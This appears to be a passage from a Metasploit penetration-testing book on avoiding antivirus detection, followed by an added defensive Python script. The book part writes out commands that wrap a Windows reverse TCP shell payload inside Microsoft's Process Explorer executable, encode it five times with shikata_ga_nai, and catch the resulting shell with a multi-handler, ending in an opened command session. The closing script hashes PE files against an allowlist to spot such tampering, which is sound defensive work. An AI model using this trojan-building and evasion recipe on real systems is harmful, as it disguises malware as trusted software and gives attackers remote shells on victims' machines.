Avoiding Detection

Custom Executable Templates

Typically, when msfencode is run, the payload is embedded into the default executable template at data/templates/template.exe. Although this template is changed on occasion, antivirus vendors still look for it when building signatures. However, msfencode now supports the use of any Windows executable in place of the default executable template via the -x option. In the following example, we encode our payload again, using Process Explorer from Microsoft's Sysinternals Suite as a custom executable template.

root@bt:/opt/framework3/msf3# wget http://download.sysinternals.com/Files/ProcessExplorer.zip
. . . SNIP . . .
2011-03-21 17:14:46 (119 KB/s) - 'ProcessExplorer.zip' saved [1615732/1615732]
root@bt:/opt/framework3/msf3# cd work/
root@bt:/opt/framework3/msf3/work# unzip ../ProcessExplorer.zip
Archive:  ../ProcessExplorer.zip
  inflating: procexp.chm
  inflating: procexp.exe
  inflating: Eula.txt
root@bt:/opt/framework3/msf3/work# cd ..
root@bt:/opt/framework3/msf3# msfpayload windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 R | msfencode -t exe -x work/procexp.exe -o /var/www/pe_backdoor.exe -e x86/shikata_ga_nai -c 5
[*] x86/shikata_ga_nai succeeded with size 342 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 369 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 396 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 423 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 450 (iteration=5)

As you can see, we first download Process Explorer from Microsoft and then unzip it. We then use the -x switch to specify the downloaded Process Explorer binary for use as our custom template. After encoding completes, we start up the multi-handler through msfcli to listen for the incoming connection, as shown here:

root@bt:/opt/framework3/msf3# msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST=192.168.1.101 LPORT=8080 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.1.101:8080
[*] Starting the payload handler...
[*] Command shell session 1 opened (192.168.1.101:8080 -> 192.168.1.195:1191)

C:\Documents and Settings\Administrator\My Documents\Downloads>

And voilà: We have successfully opened a shell without being detected by antivirus software.
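A defender-side counterpart to the template trick, added here as an example that is not from the book: re-encoding a payload into a copy of procexp.exe changes the file's bytes, so the result no longer matches the hash of the vendor's genuine binary, and any Authenticode signature the original carried can no longer verify even though the signature blob may still be present. The script below hashes a file, walks the PE optional header to see whether a signature blob exists at all, and treats the file as trusted only when its hash matches a locally recorded known-good value. The allowlist, the build_minimal_pe helper and every hash it produces are constructed for the demonstration, not real Process Explorer values.

```python
import hashlib
import struct

def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()

def certificate_table(pe: bytes):
    """Return (rva, size) of the security data directory (entry 4), or None
    if the bytes are not a PE image. Minimal header walk, not a full parser."""
    if len(pe) < 0x40 or pe[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    opt = e_lfanew + 4 + 20                    # 4-byte signature + 20-byte COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    dir_base = opt + (96 if magic == 0x10B else 112)   # PE32 vs PE32+ layout
    if len(pe) < dir_base + 5 * 8:
        return None
    return struct.unpack_from("<II", pe, dir_base + 4 * 8)

def assess(name: str, pe: bytes, known_good: dict) -> dict:
    """Compare a file against the defender's allowlist of trusted hashes.
    A present signature blob is only a hint: tampering leaves the blob in
    place but breaks it, so verify it with a real Authenticode checker."""
    digest = sha256_hex(pe)
    cert = certificate_table(pe)
    return {
        "sha256": digest,
        "hash_matches_known_good": known_good.get(name) == digest,
        "has_signature_blob": bool(cert and cert[1] > 0),
    }

def build_minimal_pe(security_size: int) -> bytes:
    """CONSTRUCTED PE32 header image (not a runnable program) for the demo."""
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)          # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 0, 0, 0, 0, 224, 0x102)
    opt = struct.pack("<H", 0x10B) + b"\0" * 94                  # fields before the directories
    dirs = [(0, 0)] * 16
    dirs[4] = (0x1000, security_size)                            # pretend a signature blob exists
    opt += b"".join(struct.pack("<II", *d) for d in dirs)
    return dos + b"PE\0\0" + coff + opt

if __name__ == "__main__":
    genuine = build_minimal_pe(512)
    allowlist = {"procexp.exe": sha256_hex(genuine)}             # recorded from the trusted copy
    tampered = genuine[:-1] + b"\x01"                            # any byte change breaks the hash
    for label, blob in (("genuine", genuine), ("tampered", tampered)):
        print(label, assess("procexp.exe", blob, allowlist))
```

The tampered copy still reports a signature blob, which is exactly why the hash comparison, not the mere presence of a certificate table, decides the verdict.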